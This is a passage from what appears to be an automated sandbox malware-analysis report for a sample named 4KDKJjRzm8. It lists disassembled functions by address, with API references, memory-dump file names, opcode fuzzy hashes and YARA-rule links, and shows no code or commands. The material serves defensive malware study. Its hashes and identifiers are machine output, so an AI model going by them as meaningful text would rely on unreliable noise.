                                                                                                                                                                                                                                                        • String ID: ><+
                                                                                                                                                                                                                                                        • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                                        • Opcode ID: 8a9c0a0e6ec041d1e04ac62db5dbb8b6b8afb9b138000ae02992440852396006
                                                                                                                                                                                                                                                        • Instruction ID: 3c834c54ee4b1f3a30fd0c72ec66d3cf15d2894269b44229c7f7578293ce1667
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a9c0a0e6ec041d1e04ac62db5dbb8b6b8afb9b138000ae02992440852396006
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3C1F2756057418FD725CF2AC490722FBE2BF9A314B28859DD4DB8BB92C735E802CB90
                                                                                                                                                                                                                                                        Function 009C0D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: @Ukx$
                                                                                                                                                                                                                                                        • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                        • Opcode ID: efd42d5a73b2a389b8231ccb72a198891a6e51a5ccd9b81bc2700d2bdf6c745c
                                                                                                                                                                                                                                                        • Instruction ID: 9170185fd13181260a633f7a4c6f2a91a583f40d3d9e585d01a811a2d599df52
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efd42d5a73b2a389b8231ccb72a198891a6e51a5ccd9b81bc2700d2bdf6c745c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58B15632F087108BD728CE28DCE1ABBB796EBC5314F1D893CD99657396CA359C058792
                                                                                                                                                                                                                                                        Function 0098E687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 17A4311328D510E6BEBA0C6A975F1733
                                                                                                                                                                                                                                                        • API String ID: 0-1446595238
                                                                                                                                                                                                                                                        • Opcode ID: c0d6a4dad536ca5bda821abc0d3c5ae9b8bfc57aaf95f7fcd8c38ab969ebcd91
                                                                                                                                                                                                                                                        • Instruction ID: 07417e585d35f44c1d21a7977eccc46ec7b9c05aad286672ba2044d5e46d5d00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0d6a4dad536ca5bda821abc0d3c5ae9b8bfc57aaf95f7fcd8c38ab969ebcd91
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB8138756407418BD3258B38CC92BA7B7E2FFDA315F0DCA6CD4868B347E679A8428750
                                                                                                                                                                                                                                                        Function 009BE110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LdrInitializeThunk.NTDLL(009C148A,00000002,00000018,?,?,00000018,?,?,?), ref: 009BE13E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                        Function 009A7440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: _^]\
                                                                                                                                                                                                                                                        • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                        • Opcode ID: a7a199f1ff0747fdb1c265ccc2a843b3241c6fd67e064e9bb9b4d64ea5137f9c
                                                                                                                                                                                                                                                        • Instruction ID: 90c58abed9d896e467d3b8a4b48cb31435ad5a4e014be1ba777ec0b5857915b8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7a199f1ff0747fdb1c265ccc2a843b3241c6fd67e064e9bb9b4d64ea5137f9c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD7118B1A0C3005BD7149BA8DC93B7BF7E5DF86318F18942CE58687292E278DC059796
                                                                                                                                                                                                                                                        Function 009C1720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: =<32
                                                                                                                                                                                                                                                        • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                        • Opcode ID: 3d5ea8eec94d816ff11af41fa457c3acd5bad8de50013792c477b645206cdbe2
                                                                                                                                                                                                                                                        • Instruction ID: c4eb535d8a98ec12afd52393b202d9e05dc79b2c3459472958b12d729565e5f6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d5ea8eec94d816ff11af41fa457c3acd5bad8de50013792c477b645206cdbe2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC312638E0C308AFE7149A549DA1F7FB3A9EB86754F18852CF685572A2D730DC40978B
                                                                                                                                                                                                                                                        Function 009A1A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,-
                                                                                                                                                                                                                                                        • API String ID: 0-1027024164
                                                                                                                                                                                                                                                        • Opcode ID: c2aed33ae7494150aa606b9917873075c12b29fdae44ff55c1cf1afaa58f74b1
                                                                                                                                                                                                                                                        • Instruction ID: 30e0d42daf9ed0a419e0e4d2539d737ba017b91b4616ba6fc5908e252ae448ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2aed33ae7494150aa606b9917873075c12b29fdae44ff55c1cf1afaa58f74b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 962125A5A153008BC7149F29CC52627B7B5EF83361F498618E4968B3A1F734CD05C7E2
                                                                                                                                                                                                                                                        Function 009C0340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: 30d191becb135937f8c37fe4eac9279a1ba41ac44067a6e13f3d22b0d52f04de
                                                                                                                                                                                                                                                        • Instruction ID: 061a87bd122799bbbc670c5031a957ad213bed147cacb26cca9071c3fc46b2a3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30d191becb135937f8c37fe4eac9279a1ba41ac44067a6e13f3d22b0d52f04de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2231E3719083048BC314DF58D8D2B7FBBE8EBC5324F14892CE699872A0E7359848CB57
                                                                                                                                                                                                                                                        Function 009C0460 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 5f3ee4175f11f3e8265ccfb19e3e08f0ee99bb13134ce12bfe68a472fc8ae59b
                                                                                                                                                                                                                                                        • Instruction ID: 891227c69ae1b0fcbfe0e1b4f2db5630aeca7e5ede9264d36f3321af5384b1b3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f3ee4175f11f3e8265ccfb19e3e08f0ee99bb13134ce12bfe68a472fc8ae59b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2612335E083059BD7149F18C990F3FB7A6EBC4760F19892CE9858B2A1EB30DC519783
                                                                                                                                                                                                                                                        Function 009BC5A0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                                        • Opcode ID: 6064b4181b342ff11dab52a8d4a1984a3c00f499ae30841c1c278823d54ec5f6
                                                                                                                                                                                                                                                        • Instruction ID: 683dab8bf1dfbab64e56e9c064054ddf68c237612d1461a9e8a0cc27c24d79aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6064b4181b342ff11dab52a8d4a1984a3c00f499ae30841c1c278823d54ec5f6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB516BF5E0C3054BD728AF28CD80A6FB7D6ABD5320F19897DE4C597391EA319C018B85
                                                                                                                                                                                                                                                        Function 0098CC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
